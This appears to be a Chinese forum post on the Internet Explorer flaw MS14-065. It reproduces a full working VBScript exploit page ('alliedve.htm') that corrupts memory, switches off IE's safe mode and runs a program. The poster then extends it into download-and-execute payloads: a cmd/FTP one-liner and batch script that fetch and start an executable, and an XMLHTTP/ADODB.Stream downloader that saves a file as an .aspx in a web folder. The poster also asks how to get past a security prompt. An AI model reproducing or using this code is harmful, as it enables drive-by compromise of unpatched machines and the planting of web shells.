MS14-065 包含了一序列的IE漏洞,其中最严重的在用户在查看特定网页时
允许远程执行代码。成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。
影响系统:2003(SP2)、Vista_32/64(SP2)、Win7_32/64(SP1)、Win8_32/64、Win8.1_32/64
目前官方已经推送了补丁。
alliedve.htm
//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html>
既然可以执行cmd 肯定可以下载运行 研究了研究写了下列code
shell.ShellExecute "cmd.exe" , "/c @echo off & set ftpfilename=autoftp.cfg & echo open 127.0.0.1 >'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo bin >>'%ftpfilename%' & echo lcd d:\ >>'%ftpfilename%' & echo get calc.exe >>'%ftpfilename%' & echo bye >>'%ftpfilename%' & ftp -s:'%ftpfilename%' & del '%ftpfilename%' & start d:\calc.exe"
@echo off set ftpfilename=autoftp.cfg echo open 127.0.0.1 >"%ftpfilename%" echo 123 >>"%ftpfilename%" echo 123 >>"%ftpfilename%" echo bin >>"%ftpfilename%" echo lcd d:\ >>"%ftpfilename%" echo get calc.exe >>"%ftpfilename%" echo bye >>"%ftpfilename%" ftp -s:"%ftpfilename%" del "%ftpfilename%" start d:\calc.exe
问题是03 打开的时候会提示是否允许活动任务在本计算机执行
可破吗?
除了ftp下载,还可以http下载
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >d:\webdown.vbs echo xPost.Open "GET",http://,0 >>d:\webdown.vbs 注:http://改为自己的下载地址 echo xPost.Send() >>d:\webdown.vbs echo Set sGet = CreateObject("ADODB.Stream") >>d:\webdown.vbs echo sGet.Mode = 3 >>d:\webdown.vbs echo sGet.Type = 1 >>d:\webdown.vbs echo sGet.Open() >>d:\webdown.vbs echo sGet.Write(xPost.responseBody) >>d:\webdown.vbs echo sGet.SaveToFile "d:\web1\asp\1.aspx",2 >>d:\webdown.vbs 注:d:\web1\asp\1.aspx改为自己的下载目录 cscript d:\webdown.vbs del d:\webdown.vbs